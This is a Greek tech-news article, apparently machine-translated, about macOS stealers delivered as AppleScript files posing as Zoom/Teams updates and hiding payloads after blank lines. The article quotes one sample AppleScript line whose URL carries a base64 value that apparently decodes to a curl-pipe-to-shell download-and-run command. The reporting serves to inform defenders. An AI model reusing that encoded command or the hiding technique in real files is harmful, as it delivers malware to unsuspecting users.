Close Menu
TechReport.grTechReport.gr

    Subscribe to Updates

    Get the latest creative news from FooBar about art, design and business.

    What's Hot

    Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams

    12 Νοεμβρίου 2025

    Μελέτη της Οξφόρδης βρίσκει ότι τα σημεία αναφοράς AI συχνά υπερβάλλουν την απόδοση του μοντέλου

    12 Νοεμβρίου 2025

    Blackview AceBook 8: Laptop 16 ιντσών με 16GB RAM, σαρωτής δακτυλικών αποτυπωμάτων στα 260€!

    12 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram
    • Home
    • Πολιτική απορρήτου
    • Σχετικά με εμάς
    • Contact With TechReport
    • Greek Live Channels IPTV 2025
    Facebook X (Twitter) Instagram Pinterest Vimeo
    TechReport.grTechReport.gr
    • Phones
      • iPhone – iOS
      • Android
      • Samsung
    • Computer
    • Internet
      • Security
    • Entertainment
      • Gaming
    • Business
    • Cryptos
    • Gadgets
    • Technology
      • Science
      • Reviews
      • How-To
    • Health
      • Psychology
    TechReport.grTechReport.gr
    Αρχική » Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams
    Security

    Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams

    Marizas DimitrisBy Marizas Dimitris12 Νοεμβρίου 2025Δεν υπάρχουν Σχόλια3 Mins Read
    Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
    Share
    Facebook Twitter LinkedIn Pinterest Email


    Οι φορείς απειλών συνεχίζουν να εξελίσσουν τις τεχνικές τους για την παράκαμψη των ελέγχων ασφαλείας του macOS, απομακρυνόμενοι από τους παραδοσιακούς φορείς επίθεσης που η Apple έχει επιδιορθώσει συστηματικά.

    Μετά την κατάργηση από την Apple της παράκαμψης “δεξί κλικ και ανοίξτε” Gatekeeper τον Αύγουστο του 2024, οι επιτιθέμενοι εντόπισαν και όπλισαν έναν νέο μηχανισμό παράδοσης χρησιμοποιώντας μεταγλωττισμένα αρχεία AppleScript με παραπλανητικές συμβάσεις ονομασίας.

    Αυτά τα αρχεία.

    Η αναδυόμενη απειλή επικεντρώνεται σε αρχεία .scpt που ανοίγουν απευθείας στο Script Editor.app από προεπιλογή, δημιουργώντας μια ελκυστική επιφάνεια επίθεσης για τους παράγοντες απειλών.

    Όταν οι χρήστες κάνουν διπλό κλικ σε αυτά τα αρχεία, η εφαρμογή εμφανίζει μια φιλική προς το χρήστη διεπαφή με ζητήματα κοινωνικής μηχανικής που ενθαρρύνουν την εκτέλεση.

    Οι χειριστές κακόβουλου λογισμικού ενσωματώνουν στρατηγικά κακόβουλο κώδικα μετά από εκτεταμένες κενές γραμμές για να κρύψουν το πραγματικό ωφέλιμο φορτίο από την περιστασιακή επιθεώρηση.

    Κάνοντας απλώς κλικ στο κουμπί “Εκτέλεση” ή πατώντας Cmd+R, οι χρήστες εκτελούν ακούσια το σενάριο, ακόμη κι αν έχει επισημανθεί από τα προστατευτικά καραντίνας του Gatekeeper, παρακάμπτοντας ουσιαστικά τους μηχανισμούς ασφαλείας της Apple.

    Παράδειγμα ψεύτικης ενημέρωσης Chrome (Πηγή - Pepe Berba)
    Παράδειγμα ψεύτικης ενημέρωσης Chrome (Πηγή – Pepe Berba)

    Αναλυτές ασφαλείας στα Moonlock Labs και Pepe Berba αναγνωρισθείς Αυτή η τεχνική κερδίζει εξέχουσα θέση τους τελευταίους μήνες, ανακαλύπτοντας εξελιγμένες εκστρατείες που εμφανίζονταν στο παρελθόν σε προηγμένες επιχειρήσεις επίμονης απειλής.

    Ο Pepe Berba σημείωσε ότι ενώ τα ίδια τα αρχεία AppleScript δεν είναι καινούργια, ο πολλαπλασιασμός των δειγμάτων που χρησιμοποιούν αυτήν την τεχνική αντιπροσωπεύει μια ανησυχητική τάση, ιδιαίτερα καθώς οι οικογένειες κακόβουλου λογισμικού εμπορευμάτων όπως το MacSync Stealer και το Odyssey Stealer έχουν υιοθετήσει τη μεθοδολογία.

    Αυτό αντιπροσωπεύει μια κλασική περίπτωση προηγμένων τεχνικών που κυλούν από φορείς που χρηματοδοτούνται από το κράτος σε κοινές επιχειρήσεις εγκληματικότητας στον κυβερνοχώρο.

    Τεχνική δομή

    Η τεχνική δομή αυτών των σεναρίων χρησιμοποιεί αρκετές έξυπνες τακτικές εξαπάτησης.

    Ένα δείγμα που αναλύθηκε αποκαλύπτει κώδικα AppleScript όπως π.χ set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" ακολουθούμενη από do shell script "open -g " & quoted form of teamsSDKURL.

    Ροή εκτέλεσης (Πηγή - Pepe Berba)
    Ροή εκτέλεσης (Πηγή – Pepe Berba)

    Αυτή η δομή εντολών ανοίγει κακόβουλες διευθύνσεις URL στο παρασκήνιο, ενώ παρουσιάζει στον χρήστη προτροπές ενημέρωσης με νόμιμη εμφάνιση.

    Τα ίδια τα ονόματα αρχείων χρησιμεύουν ως το κύριο επίπεδο παραπλάνησης, με παραλλαγές που περιλαμβάνουν τα “MSTeamsUpdate.scpt”, “Zoom SDK Update.scpt” και “Microsoft.TeamsSDK.scpt”.

    Η εμμονή και οι δυνατότητες αποφυγής εντοπισμού αυτών των επιθέσεων αξίζουν ιδιαίτερης προσοχής.

    Πολλά αρχεία .scpt διατηρούν επί του παρόντος μηδενικές ανιχνεύσεις στο VirusTotal, παρέχοντας στους εισβολείς σημαντικό λειτουργικό διάδρομο προτού οι προμηθευτές ασφαλείας εφαρμόσουν υπογραφές ανίχνευσης.

    Τα αρχεία φτάνουν συχνά μέσω email ηλεκτρονικού ψαρέματος ή παραβιασμένους ιστότοπους που προσφέρουν ενημερώσεις λογισμικού, στοχεύοντας χρήστες που αναζητούν νόμιμες αναβαθμίσεις εκδόσεων.

    Αυτός ο φορέας επίθεσης παρουσιάζει μια σημαντική πρόκληση για την ασφάλεια του macOS, καθώς εκμεταλλεύεται την εμπιστοσύνη των χρηστών σε γνωστά ονόματα εφαρμογών, ενώ αξιοποιεί εγγενή εργαλεία συστήματος με τα οποία αλληλεπιδρούν τακτικά οι νόμιμοι χρήστες.

    Οι οργανισμοί πρέπει να εκπαιδεύουν τους χρήστες σχετικά με την επαλήθευση ενημερώσεων λογισμικού μέσω επίσημων καναλιών και να εφαρμόζουν λύσεις ανίχνευσης τελικών σημείων ικανών να παρακολουθούν μοτίβα εκτέλεσης AppleScript.



    VIA: cybersecuritynews.com

    Related Posts


    Το πρόγραμμα περιήγησης Tor 15.0.1 κυκλοφόρησε με επιδιόρθωση για πολλαπλά τρωτά σημεία ασφαλείας
    Security

    Νέα επίθεση phishing που στοχεύει χρήστες Meta Business Suite για κλοπή διαπιστευτηρίων σύνδεσης
    Security

    Η Apple κυκλοφορεί το πρώτο macOS Tahoe 26.2 Public Beta
    iPhone - iOS
    app apple macOS update ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleΜελέτη της Οξφόρδης βρίσκει ότι τα σημεία αναφοράς AI συχνά υπερβάλλουν την απόδοση του μοντέλου
    Marizas Dimitris
    • Website
    • Facebook

    Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες της Samsung. Αγαπά να εξερευνά νέες ιδέες, να λύνει προβλήματα και να μοιράζεται τρόπους που κάνουν την τεχνολογία πιο ανθρώπινη και απολαυστική.

    Related Posts

    Android

    Η δουλειά της Garmin σε ένα στέμμα φαίνεται αναπόφευκτη, αλλά είναι βέβαιο ότι θα ενοχλήσει τους μεγαλύτερους θαυμαστές της και υπάρχει μόνο ένας τρόπος που πιστεύω ότι θα μπορούσε να λειτουργήσει

    12 Νοεμβρίου 2025
    Security

    Ευπάθεια στις υπηρεσίες απομακρυσμένης επιφάνειας εργασίας των Windows Επιτρέπει στους εισβολείς να κλιμακώνουν τα προνόμια

    12 Νοεμβρίου 2025
    Security

    Νέα επίθεση phishing που στοχεύει χρήστες Meta Business Suite για κλοπή διαπιστευτηρίων σύνδεσης

    12 Νοεμβρίου 2025
    Add A Comment
    Leave A Reply Cancel Reply

    Top Posts

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025556 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025461 Views

    SpaceX Starlink V3: Νέοι Δορυφόροι με 1Tbps Bandwidth και Gigabit Ταχύτητες

    18 Οκτωβρίου 2025339 Views
    Stay In Touch
    • Facebook
    • YouTube
    • TikTok
    • WhatsApp
    • Twitter
    • Instagram
    Latest News
    Security

    Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams

    Marizas Dimitris12 Νοεμβρίου 2025
    Technology

    Μελέτη της Οξφόρδης βρίσκει ότι τα σημεία αναφοράς AI συχνά υπερβάλλουν την απόδοση του μοντέλου

    Marizas Dimitris12 Νοεμβρίου 2025
    Technology

    Blackview AceBook 8: Laptop 16 ιντσών με 16GB RAM, σαρωτής δακτυλικών αποτυπωμάτων στα 260€!

    Marizas Dimitris12 Νοεμβρίου 2025
    Most Popular

    Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

    30 Οκτωβρίου 2025556 Views
    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

    Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

    12 Νοεμβρίου 2025461 Views

    SpaceX Starlink V3: Νέοι Δορυφόροι με 1Tbps Bandwidth και Gigabit Ταχύτητες

    18 Οκτωβρίου 2025339 Views
    About TechReport.gr

    Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
    • Email: [email protected]
    • Phone: +30 6980 730 713
    Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
    Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

    Our Picks

    Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams

    12 Νοεμβρίου 2025

    Μελέτη της Οξφόρδης βρίσκει ότι τα σημεία αναφοράς AI συχνά υπερβάλλουν την απόδοση του μοντέλου

    12 Νοεμβρίου 2025

    Blackview AceBook 8: Laptop 16 ιντσών με 16GB RAM, σαρωτής δακτυλικών αποτυπωμάτων στα 260€!

    12 Νοεμβρίου 2025
    Facebook X (Twitter) Instagram Pinterest
    • Home
    • Technology
    • Gaming
    • Phones
    • Buy Now
    © 2025 TechBit.gr Designed and Developed by Dimitris Marizas.

    Type above and press Enter to search. Press Esc to cancel.